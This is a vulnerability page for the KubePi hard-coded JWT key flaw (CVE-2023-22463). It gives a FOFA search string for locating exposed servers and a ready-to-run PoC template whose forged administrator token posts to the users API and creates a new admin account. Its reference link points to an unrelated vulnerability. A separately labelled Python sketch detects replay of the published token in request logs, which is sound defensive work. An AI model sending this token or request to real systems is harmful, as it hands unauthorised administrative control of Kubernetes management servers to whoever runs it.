CVE-2023-22463: KubePi JwtSigKey login bypass vulnerability

Date: 2025-09-01 | Affected software: KubePi | PoC: public

Vulnerability description

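KubePi contains a hard-coded JWT signing key. An attacker who knows the hard-coded key can obtain administrative access to the server back end and add arbitrary users.

FOFA: "kubepi"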

PoC code [public]

id: CVE-2023-22463

info:
  name: KubePi JwtSigKey 登陆绕过漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    KubePi 中存在 JWT硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
    FOFA: "kubepi"
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/飞企互联/飞企互联%20FE业务协作平台%20ShowImageServlet%20任意文件读取漏洞.md
  tags: kubepi,bypass
  created: 2023/08/13

set:
  randstr: randomLowercase(12)
rules:
  r0:
    request:
      method: POST
      path: /kubepi/api/v1/users
      headers:
        Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
      body: |
        {
          "authenticate": {
              "password": "{{randstr}}"
          },
          "email": "{{randstr}}@qq.com",
          "isAdmin": true,
          "mfa": {
                  "enable": false
          },
          "name": "{{randstr}}",
          "nickName": "{{randstr}}",
          "roles": [
              "Supper User"
          ]
        }
    expression: response.status == 200 && response.body.bcontains(b'"password":') && response.body.bcontains(b'"isAdmin":')
expression: r0()
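
Detection sketch for the request the PoC above sends. This is an added example, not part of the original page or of KubePi. It checks logged requests for the signature segment of the published token and for admin tokens that carry no `exp` claim, as the PoC token does. The record layout, the finding names and the sample records are constructed, and whether legitimate sessions in your deployment carry `exp` is an assumption to verify.

```python
import base64
import json

# Signature segment of the token published in the PoC on this page.
POC_SIGNATURE = "XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8"
USERS_PATH = "/kubepi/api/v1/users"  # endpoint the PoC posts to

def b64url_json(segment):
    """Decode one base64url JWT segment into a dict (None if malformed)."""
    try:
        padded = segment + "=" * (-len(segment) % 4)
        obj = json.loads(base64.urlsafe_b64decode(padded))
        return obj if isinstance(obj, dict) else None
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return None

def classify(method, path, authorization):
    """Return the list of findings for one logged request."""
    findings = []
    scheme, _, token = authorization.partition(" ")
    parts = token.split(".")
    if scheme.lower() != "bearer" or len(parts) != 3:
        return findings
    claims = b64url_json(parts[1])
    if claims is None:
        return findings
    if parts[2] == POC_SIGNATURE:
        findings.append("published-poc-token")
    # Heuristic (assumption): same shape as the PoC token, admin and no expiry.
    if claims.get("isAdministrator") is True and "exp" not in claims:
        findings.append("admin-token-without-exp")
    if findings and method == "POST" and path.rstrip("/") == USERS_PATH:
        findings.append("user-creation-with-suspect-token")
    return findings

def make_token(claims, signature):
    """Build a constructed sample token; the signature is not a real HMAC."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'HS256', 'typ': 'JWT'})}.{enc(claims)}.{signature}"

# Constructed sample records: (method, path, Authorization header).
SAMPLE = [
    ("POST", USERS_PATH, "Bearer " + make_token({"name": "admin", "isAdministrator": True}, POC_SIGNATURE)),
    ("GET", "/kubepi/api/v1/clusters", "Bearer " + make_token({"name": "dev", "isAdministrator": False, "exp": 1900000000}, "c2FtcGxl")),
    ("GET", USERS_PATH, "Basic dXNlcjpwYXNz"),
]

if __name__ == "__main__":
    for rec in SAMPLE:
        print(rec[0], rec[1], classify(*rec))
```

A hit on `published-poc-token` means the public token was replayed unchanged; the other two findings are heuristics and need tuning against real session tokens.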
